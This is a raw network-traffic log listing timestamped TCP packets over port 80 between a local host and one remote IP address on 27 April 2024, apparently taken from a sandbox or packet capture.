Apr 27, 2024 00:46:06.614003897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.614049911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.614089012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.614093065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.614202976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.614237070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.614285946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.614352942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.614375114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.614387035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.614435911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.614466906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.614506960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.614598989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.614635944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.614658117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.614705086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.614742041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.614754915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.614784956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.614820957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.614850998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.614918947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.614949942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.614995956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.615067005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.615106106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.615159035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.615216970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.615252018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.615276098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.615343094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.615381002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.615418911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.615492105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.615528107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.615587950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.615628004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.615664959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.615761995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.615866899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.615901947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.615942001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.616003036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.616034985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.616182089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.616198063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.616215944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.616235018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.616313934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.616352081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.616353035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.616492987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.616529942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.616770029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.616858959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.616895914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.616923094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.617041111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.617065907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.617074966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.617145061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.617178917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.617254019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.617297888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.617331028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.617347002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.617501020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.617537022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.617578030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.617702007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.617738008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.617798090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.617835999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.617866993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.617906094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.618030071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.618067980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.618100882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.618146896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.618177891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.618289948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.618334055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.618371964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.618411064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.618670940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.618701935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.619479895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.620209932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.620250940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.620470047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.620609045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.620647907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.620711088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.620760918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.620793104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.620809078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.620872021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.620904922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.620999098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.621128082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.621165037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.621269941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.621366024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.621401072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.621479034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.621722937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.621757030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.621792078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.621908903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.621931076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.621944904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.622165918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.622199059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.622231007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.622292995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.622330904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.622415066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.622451067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.622493029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.622493982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.622551918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.622589111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.622612000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.622693062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.622726917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.622781992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.622797012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.622831106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.622872114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.622927904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.622960091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.622994900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.623007059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.623040915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.623123884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.623249054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.623286009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.623359919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.623399019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.623431921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.623459101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.623529911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.623563051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.623584986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.623651028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.623675108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.623687983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.623755932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.623779058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.623788118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.623850107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.623889923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.623923063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.624000072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.624041080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.624111891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.624186039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.624221087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.624245882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.624342918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.624378920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.624445915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.624492884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.624525070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.624579906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.624670982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.624706984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.624761105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.624855995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.624890089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.624963045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.625066996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.625097990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.625132084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.625221014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.625238895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.625260115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.625354052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.625391006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.625395060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.625473976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.625504971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.625514984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.625576973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.625610113 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.625682116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.625746965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.625783920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.625813961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.625870943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.625905991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.625906944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.625968933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.626005888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.626007080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.626065016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.626089096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.626106024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.626135111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.626166105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.626207113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.626300097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.626339912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.626365900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.626503944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.626535892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.626666069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.626684904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.626718044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.626754045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.626810074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.626844883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.626915932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.626945972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.626975060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.627067089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.627197027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.627232075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.627264977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.627430916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.627466917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.627526999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.627584934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.627616882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.627648115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.627701998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.627737045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.627770901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.627808094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.627841949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.627911091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.627964973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.627998114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.628237963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.628381968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.628417969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.628444910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.628508091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.628541946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.628590107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.628669024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.628705978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.628751993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.628808022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.628845930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.628901958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.628969908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.629007101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.629061937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.629129887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.629165888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.629203081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.629321098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.629354954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.629374981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.629441977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.629468918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.629482985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.629591942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.629610062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.629621029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.629693985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.629740000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.629770041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.629832029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.629868031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.629897118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.629972935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.630003929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.630073071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.630129099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.630167007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.630270958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.630356073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.630394936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.630490065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.630605936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.630640984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.630697012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.630815983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.630853891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.630912066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.630975008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.631014109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.631042004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.631145954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.631179094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.631202936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.631247997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.631283045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.631295919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.631350994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.631390095 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.631407976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.631468058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.631503105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.631532907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.631652117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.631685972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.631714106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.631861925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.631899118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.631954908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.631972075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.632008076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.632226944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.632340908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.632378101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.632416010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.632496119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.632536888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.632599115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.632653952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.632688046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.632709980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.632766962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.632805109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.632847071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.632946014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.632978916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.633018017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.633111954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.633152008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.633202076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.633275986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.633310080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.633352041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.633444071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.633479118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.633486032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.633538961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.633574009 CEST	49734	80	192.168.2.4	176.97.76.106
